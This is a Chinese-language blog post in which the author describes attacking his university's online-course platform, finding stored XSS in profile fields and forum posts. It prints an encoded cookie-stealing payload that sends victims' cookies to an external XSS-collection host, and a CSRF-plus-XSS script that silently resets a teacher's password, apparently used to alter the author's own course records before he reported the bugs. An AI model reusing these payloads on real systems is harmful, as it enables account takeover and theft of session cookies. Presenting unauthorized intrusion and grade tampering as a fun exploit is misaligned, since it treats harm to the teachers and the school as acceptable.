本文首发于“合天智汇”公众号,作者: 影子
各位大师傅,第一次在合天发文章,请多多关照
![](https://pic2.zhimg.com/80/v2-0d8c0c99b4be8d6cd1fa3c8ef9c10ff1_720w.jpeg)
今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了
![](https://pic1.zhimg.com/80/v2-f3bd3b69bf592b070fcc25210bdb909f_720w.jpeg)
,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难啊,难啊)
-
0x01
![](https://pic4.zhimg.com/80/v2-46da0642eb36b2feb5782d6a1158a510_720w.jpeg)
这个站是我疫情时候在线上网课的平台,本着对信息安全做贡献的目的下去做的这个渗透工作(咳咳,这个平台有个签到,每次签到我都在与大脑作斗争,最后争不过大脑,选择了睡觉,最后旷课太多,不搞要挂科。)
-
0x02
这个站简单的先用手机看了下,这种网课站我感觉xss比较好寻找一些,所以我找到的都是一些存储型xss,
先看一下第一个基本没鸟用的xss
用户个人资料处
![](https://pic1.zhimg.com/80/v2-a1e6e7c50e53436f88c65f13f65f534a_720w.jpeg)
更改姓名
Payload为<script>alert()</script>
(这个地方字数有限制,最长为24个字符)
保存,刷新页面
![](https://pic4.zhimg.com/80/v2-349d9c690b8a7ffe3fafdb87f05963cc_720w.jpeg)
成功显示弹窗 经测试
1.学号
2.身份
3.学校
4.姓名处均存在存储型xss并能够弹窗
确实这个地方感觉确实没什么用,字数有限制,顶多就是在老师打开页面的时候弹出一个弹框,没鸟用啊,回头想想自己旷课的次数,md,拼了
-
0x03
![](https://pic2.zhimg.com/80/v2-39162e49fe64f6c4687c672908698038_720w.jpeg)
发布新话题
测试发现
![](https://pic1.zhimg.com/80/v2-79516bc630e3499499e9b001b7a8a0f9_720w.jpeg)
将上面全部代码进行复制
在下面编辑框中进行黏贴,直接解析为html
内容处可以执行html代码
测试发布时
![](https://pic1.zhimg.com/80/v2-240c30184fe330a218dd31dbd0914fb7_720w.jpeg)
发布后访问此话题
![](https://pic3.zhimg.com/80/v2-b56f62bdd29d0836e623720f82ef31a0_720w.jpeg)
成功xss
进行下一步测试
进行获取cookies
在<script src=””>
这个payload无法执行
不知道是服务器问题还是什么
换用其他payload
![](https://pic4.zhimg.com/80/v2-249266caf911a1ed635509776a4786b0_720w.jpeg)
in_str = "(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=Mli4D9&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=Mli4D9&url='+escape(document.location)+'&cookie='+escape(document.cookie)};" output = "" for c in in_str: output += "&#" + str(ord(c)) print("<svg><script>eval("" + output + "")</script>")
payload为
在进行测试
![](https://pic3.zhimg.com/80/v2-c770b1d5ded90c512e5fb6ac202798be_720w.jpeg)
<svg><script>eval("(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=Mli4D9&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=Mli4D9&url='+escape(document.location)+'&cookie='+escape(document.cookie)};")</script>
![](https://pic1.zhimg.com/80/v2-e117b06b2b26710710444ed67374b9be_720w.jpeg)
![](https://pic2.zhimg.com/80/v2-6aca5e22f30f72ba2545e0292063c107_720w.jpeg)
看看xss平台
![](https://pic3.zhimg.com/80/v2-8d69ad248c238afc5d396c603ebf23e3_720w.jpeg)
![](https://pic1.zhimg.com/80/v2-a14c5265879322db343cb8d8a94b6a83_720w.jpeg)
成功获取
也可以使用其他的利用方法
![](https://pic2.zhimg.com/80/v2-50e1fc4d77597f59b2c8da623e72ebd8_720w.jpeg)
![](https://pic4.zhimg.com/80/v2-218746d6aee85f3c510076e628e1ef92_720w.jpeg)
跳转钓鱼网站
在页面内这是html表单进行钓鱼
或者js挂马等等
严重程度
中危
But。。
部分Cookeis设置了http-only,拿不到老师的全部cookie。
-
0x04
继续测试
更改密码处没有验证原先密码
![](https://pic2.zhimg.com/80/v2-24d124af9db792d630e78c9ea9143f4b_720w.jpeg)
根据前面找到的xss构建payload
![](https://pic3.zhimg.com/80/v2-cfd7d0dfb8c833f59984fe971c12b43e_720w.jpeg)
``` <script type="text/javascript" src="http://admin.3cjz.cn/include/jQ.js"></script> <script> function loginSubmit() { $.ajax({ url: "https://www.xxxxxxxx.com/UserApi/updatePassword", type: "post", data: {"newpassword": "123456789"}, dataType: "json", success: function (data) { if (data.status == "1") { } else { } }, }); } loginSubmit() </script> ```
那么要去受害者要有兴趣去访问这个payload
![](https://pic2.zhimg.com/80/v2-08f85b5f5ba391567afc498d2021d9aa_720w.jpeg)
作业处,受害者(例如老师,获取更大权限)老师要去更改作业
![](https://pic1.zhimg.com/80/v2-ec257db4d957ec05567181766d9efea0_720w.jpeg)
找到在作业留言处存在存储型xss
在此处插入payload
查看效果
![](https://pic3.zhimg.com/80/v2-bc88cd8731de5f4f0055ebabf0bf65ef_720w.jpeg)
现在密码为123456789
登录正常
将payload的密码改为123456789.
我用的手机端(pc端似乎要抓包,懒)
![](https://pic2.zhimg.com/80/v2-23d0fbade9ce1d7ee1e0cbcbfb38cc25_720w.jpeg)
![](https://pic1.zhimg.com/80/v2-1d5cff0fe74f1e339aceba32363a98c8_720w.jpeg)
提交成功
教师端进入批阅
老师的管理界面
![](https://pic4.zhimg.com/80/v2-4a51988ad7e263c0f02d838de49a428c_720w.jpeg)
教师端进入批阅
![](https://pic3.zhimg.com/80/v2-da1d19c64a52045485f99d9df1012906_720w.jpeg)
![](https://pic3.zhimg.com/80/v2-1f1e246e399e88d3e68ad794d7e69d55_720w.jpeg)
![](https://pic4.zhimg.com/80/v2-a982fa5ea822fe82d609c889bdedb0bb_720w.jpeg)
![](https://pic3.zhimg.com/80/v2-1f1e246e399e88d3e68ad794d7e69d55_720w.jpeg)
抓包看到
访问时,直接更新了密码
![](https://pic3.zhimg.com/80/v2-5573fa8abb4e631c28aa1acffec4783f_720w.jpeg)
退出
密码为12345679时错误
![](https://pic3.zhimg.com/80/v2-76b5e30dbfa9c3cd9f3bad47a091b791_720w.jpeg)
密码为123456789.时成功
![](https://pic1.zhimg.com/80/v2-ca8ecaabf7bcb7e89653b7cff98bd116_720w.jpeg)
更改密码处存在csrf
联想到刚刚的存储型xss,
![](https://pic2.zhimg.com/80/v2-c8cd1638b552ce9053bb9d569e344081_720w.jpeg)
一个csrf+xss的组合拳漏洞
![](https://pic1.zhimg.com/80/v2-63838d607332c9cce72b9da191b2fefe_720w.jpeg)
-
0x05
最后到底有没有拿到老师权限呢
![](https://pic2.zhimg.com/80/v2-4d7d2e64d97dbaf49fe268f42f083f16_720w.jpeg)
![](https://pic3.zhimg.com/80/v2-87a76b827fcbc245ab6796d084b1055a_720w.jpeg)
![](https://pic2.zhimg.com/80/v2-759332f03811449ff8631675622e4d8f_720w.jpeg)
最高星星数6个
![](https://pic3.zhimg.com/80/v2-9a98c1e0b2106b6584432101bedc9f24_720w.jpeg)
怕被发现。
真带劲
哈哈
![](https://pic3.zhimg.com/80/v2-bdb8102e32b022b4df9a1a3f7d2c03d2_720w.jpeg)
搞完手工,打包提交,以上漏洞至今为止已修复。
声明:作者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关。
实验推荐
DoraBox之CSRF
https://www.hetianlab.com/expc.do?ec=ECID6f07-3348-4d8f-90a1-2b399f28378b
(通过DoraBox靶场系列闯关练习,理解跨站请求伪造漏洞的原理与利用过程。)